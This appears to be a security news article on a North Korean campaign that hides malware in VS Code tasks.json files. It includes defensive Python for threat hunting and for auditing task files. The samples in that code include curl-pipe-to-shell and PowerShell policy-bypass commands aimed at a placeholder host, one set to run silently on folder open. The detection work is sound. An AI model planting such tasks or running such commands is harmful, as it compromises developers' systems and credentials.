A North Korean state-sponsored hacking group has been observed using a novel method to distribute malware, leveraging the trusted development environment of Microsoft's Visual Studio Code. Security researchers have attributed a new campaign, active since December 2025, to the threat actor known as WaterPlum, whose operations are also tracked under the campaign name Contagious Interview.
The group is deploying a malicious software family called StoatWaffle by hiding it within trojanized VS Code projects. Their primary infection vector is the abuse of the editor's ".vscode/tasks.json" configuration file, which is designed to automate common development steps such as builds and test runs.
Technical Details of the Attack
In this campaign, attackers create or compromise legitimate-seeming software projects. Within these projects, they embed malicious instructions in the ".vscode/tasks.json" file. This file is part of VS Code's task automation system, which developers use to run scripts, build tools, or start applications directly from the editor. A task of type "shell" is simply a command line that VS Code hands to the user's shell, so it runs whatever the file says, with the developer's own privileges, SSH keys and cached credentials.
When an unsuspecting developer opens the project and runs the predefined task, often believing it to be a harmless build step, the malicious command executes. This installs the StoatWaffle malware on the developer's system with no interaction beyond a routine development action. The step can be smaller still: VS Code also lets a task declare "runOn": "folderOpen" under its "runOptions", in which case the task starts as soon as the folder is opened in a trusted workspace, so a reviewer should treat that setting as equivalent to having run the command.
Attribution and Actor Profile
The activity has been confidently linked to the WaterPlum group, a cyber-operations unit working on behalf of North Korea. This actor, whose activity is referenced in security circles as Contagious Interview, is best known for approaching software developers with fake job interviews and take-home coding assignments that carry trojanized code, with technology and cryptocurrency firms among its most frequent targets.
Their focus typically involves intelligence gathering, intellectual property theft, and financial theft, above all of cryptocurrency, to fund the regime. Abusing a developer tool is an evolution of that playbook rather than a break from it: earlier lures delivered malicious code through repositories and packages the victim was asked to run, whereas a tasks.json entry lets the editor itself launch the payload, giving the group a foothold from which to reach an organization's source code, build pipeline and cloud credentials.
Significance of the VS Code Vector
The use of Microsoft Visual Studio Code as an attack platform is significant due to its immense popularity. VS Code is one of the world’s most widely used source-code editors, trusted by millions of developers across industries. By subverting a core feature meant for productivity, the hackers gain a high level of camouflage.
Security analysts note that this method evades many conventional controls because the command is launched by a trusted, allow-listed application doing something it does every day: spawning a shell for a task. Parent-process allow-lists, publisher checks and the user's own sense of what is normal all look past it; the tell is what that shell goes on to run, such as a downloader, an encoded PowerShell command or a script staged in a temporary directory. The attack demonstrates a growing trend where threat actors increasingly target the tools and platforms used by software creators themselves.
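As an added illustration of that detection point (not code from the original reports or from any vendor product), the following Python models the check an endpoint team would write over process-creation telemetry: rather than trusting an allow-listed parent, it walks process ancestry and flags downloaders, encoded or policy-bypassing PowerShell, and URL-bearing command lines whose chain leads back to the editor process, while letting an ordinary build under the editor pass. The events and field names are constructed here in a Sysmon-like shape, and the hostnames are not real.

```python
"""Hunt process-creation telemetry for downloader or script-fetching activity
whose process ancestry leads back to the VS Code editor process."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-case
    cmdline: str


EDITOR_IMAGES = {"code.exe", "code", "code-insiders"}
DOWNLOADER_IMAGES = {"curl.exe", "curl", "wget", "certutil.exe", "bitsadmin.exe", "mshta.exe"}
# Command-line traits that make a child of the editor worth a look. Illustrative list.
SUSPICIOUS_CMDLINE = re.compile(
    r"https?://|\b(iex|Invoke-WebRequest|Invoke-Expression|iwr|irm)\b"
    r"|-(enc|EncodedCommand|ExecutionPolicy\s+Bypass)\b",
    re.IGNORECASE,
)

# Constructed Sysmon-style events (pids 1 and 50 are not in the sample, so those
# chains stop there). Hostnames are not real.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "code.exe", r"Code.exe --folder-uri file:///C:/src/project"),
    # the developer's ordinary build task: shell under the editor, nothing fetched
    ProcEvent(200, 100, "pwsh.exe", "pwsh -Command npm run build"),
    ProcEvent(201, 200, "node.exe", "node scripts/build.js"),
    # a task that stages and runs a remote script
    ProcEvent(300, 100, "cmd.exe",
              r'cmd /c "curl -fsSL https://example.invalid/setup.ps1 -o %TEMP%\setup.ps1'
              r' && powershell -ExecutionPolicy Bypass -File %TEMP%\setup.ps1"'),
    ProcEvent(301, 300, "curl.exe",
              r"curl -fsSL https://example.invalid/setup.ps1 -o C:\Users\dev\AppData\Local\Temp\setup.ps1"),
    ProcEvent(302, 300, "powershell.exe",
              r"powershell -ExecutionPolicy Bypass -File C:\Users\dev\AppData\Local\Temp\setup.ps1"),
    # the same tool from an unrelated terminal: not under the editor, so not flagged
    ProcEvent(400, 50, "curl.exe", "curl https://api.example.invalid/health"),
]


def is_suspect(ev: ProcEvent) -> bool:
    """A process is suspect by image name or by what its command line does."""
    return ev.image in DOWNLOADER_IMAGES or bool(SUSPICIOUS_CMDLINE.search(ev.cmdline))


def ancestry(ev: ProcEvent, by_pid: dict) -> list:
    """Image names from the oldest known ancestor down to ev (cycle-safe)."""
    chain, seen, cur = [ev.image], {ev.pid}, ev
    while cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur.image)
    return chain[::-1]


def find_editor_spawned_suspects(events: list) -> list:
    """Return (pid, 'chain > of > images', cmdline) for each suspect process
    whose ancestry passes through the editor."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if not is_suspect(ev):
            continue
        chain = ancestry(ev, by_pid)
        if any(img in EDITOR_IMAGES for img in chain[:-1]):
            hits.append((ev.pid, " > ".join(chain), ev.cmdline))
    return hits


if __name__ == "__main__":
    for pid, chain, cmdline in find_editor_spawned_suspects(SAMPLE_EVENTS):
        print(f"[!] pid {pid}: {chain}\n    {cmdline}")
```

The ancestry walk is the point: the editor is a legitimate parent, so the rule keys on the grandchild's behaviour rather than on the parent's identity. In production the image and command-line lists need tuning against the organization's real build tooling, since developers do run curl from integrated terminals.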
Mitigation and Security Recommendations
Organizations and individual developers are advised to exercise heightened caution when opening VS Code projects from unverified or unknown sources. Keep VS Code's Workspace Trust feature enabled and open unfamiliar folders in Restricted Mode, which disables task execution until the workspace is explicitly trusted. Before trusting it, read everything under ".vscode/" (tasks.json, but also launch.json, whose preLaunchTask can invoke a task) and treat any task marked to run on folder open, or whose command fetches, decodes or pipes content into a shell, as hostile until proven otherwise. This applies especially to projects downloaded from the internet, received via email, or handed over as part of a job application or coding test.
Maintaining updated antivirus and endpoint detection software remains crucial, and EDR rules should specifically flag shells spawned by the editor that go on to launch downloaders or interpreters. Furthermore, developers should run development environments with the minimum necessary system permissions, ideally opening untrusted projects in a container or disposable VM that holds no SSH keys, cloud tokens or wallet files, to limit the potential damage from such an intrusion. Official guidance from Microsoft regarding VS Code security best practices is expected to be updated in response to this threat.
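The following is an added example, not code from the original reports, from VS Code, or from any vendor tool: a small Python audit of a ".vscode/tasks.json" that applies the review advised above, and that also makes concrete the task-file mechanism described under Technical Details. It flags tasks that run on folder open, hide their terminal output, or whose command line fetches, decodes or pipes remote content into an interpreter. The tasks file it checks is constructed for the example, the hostname example.invalid is not real, and the pattern list is an illustrative starting point rather than a complete signature set.

```python
"""Audit a VS Code .vscode/tasks.json for tasks that run on their own,
hide their output, or fetch and execute remote content."""
import json
import re

# Constructed sample file: one ordinary npm build task and one task that
# would pull a script from the network. The hostname is not real.
SAMPLE_TASKS_JSON = r'''{
  // tasks.json is JSONC: comments and trailing commas are permitted
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "npm",
      "script": "build",
      "group": { "kind": "build", "isDefault": true }
    },
    {
      "label": "prepare",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never", "echo": false },
      "problemMatcher": [],
    },
  ]
}'''

# Command-line traits worth a human look. Illustrative, not exhaustive.
RISKY_PATTERNS = [
    (r"\b(curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b",
     "downloads content from the network"),
    (r"\|\s*(sh|bash|zsh|python3?|node|iex|Invoke-Expression)\b",
     "pipes fetched content into an interpreter"),
    (r"-(enc|EncodedCommand|e)\s+[A-Za-z0-9+/=]{20,}",
     "passes an encoded PowerShell command"),
    (r"\b(base64|certutil\s+-decode|FromBase64String)\b",
     "decodes embedded data"),
    (r"(chmod\s+\+x|/tmp/|%TEMP%|\$env:TEMP)",
     "stages a file in a temporary location"),
]


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside string literals, then trailing commas.
    The trailing-comma step is a regex and would also touch a literal ",}"
    inside a string: acceptable for an audit tool, not for a general parser."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:       # keep the escaped char, e.g. \"
                out.append(text[i + 1])
                i += 2
                continue
            in_str = c != '"'
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def _command_text(task: dict) -> str:
    """Join command and args, including the windows/linux/osx overrides."""
    parts = []
    for scope in (task, *(task.get(k) or {} for k in ("windows", "linux", "osx"))):
        cmd = scope.get("command")
        if isinstance(cmd, dict):            # {"value": ..., "quoting": ...} form
            cmd = cmd.get("value")
        if cmd:
            parts.append(str(cmd))
        for arg in scope.get("args") or []:
            parts.append(str(arg.get("value") if isinstance(arg, dict) else arg))
    return " ".join(parts)


def audit_tasks(text: str) -> list:
    """Return one finding per suspicious task: label, type, command, reasons."""
    doc = json.loads(strip_jsonc(text))
    findings = []
    for task in doc.get("tasks", []):
        reasons = []
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            reasons.append("runs automatically when the folder is opened (runOn: folderOpen)")
        pres = task.get("presentation") or {}
        if pres.get("reveal") == "never" or pres.get("echo") is False:
            reasons.append("hides its terminal output (presentation.reveal/echo)")
        cmd = _command_text(task)
        for pattern, why in RISKY_PATTERNS:
            if re.search(pattern, cmd, re.IGNORECASE):
                reasons.append(why)
        if reasons:
            findings.append({"label": task.get("label", "<unlabelled>"),
                             "type": task.get("type"), "command": cmd,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_TASKS_JSON):
        print(f"[!] task {f['label']!r} ({f['type']}): {f['command']}")
        for why in f["reasons"]:
            print("    -", why)
```

Run it against a cloned project's ".vscode/tasks.json" before trusting the workspace; the "build" task produces no findings, while "prepare" is reported for all four traits. The JSONC handling matters because VS Code accepts comments and trailing commas that a plain JSON parser rejects, and an attacker can use exactly that to make a file that the editor runs but a naive scanner cannot read.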
Forward-Looking Analysis
Security researchers anticipate that other advanced persistent threat (APT) groups may adopt similar techniques, leading to a wider exploitation of trust in developer ecosystems. The cybersecurity community is actively analyzing the StoatWaffle malware’s full capabilities to understand its data exfiltration methods and command-and-control infrastructure.
Formal advisories from national cybersecurity agencies, including the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and South Korea’s National Intelligence Service, are likely to be issued in the coming weeks. These will provide detailed indicators of compromise and further defensive strategies for at-risk sectors.
Source: Adapted from multiple cybersecurity research reports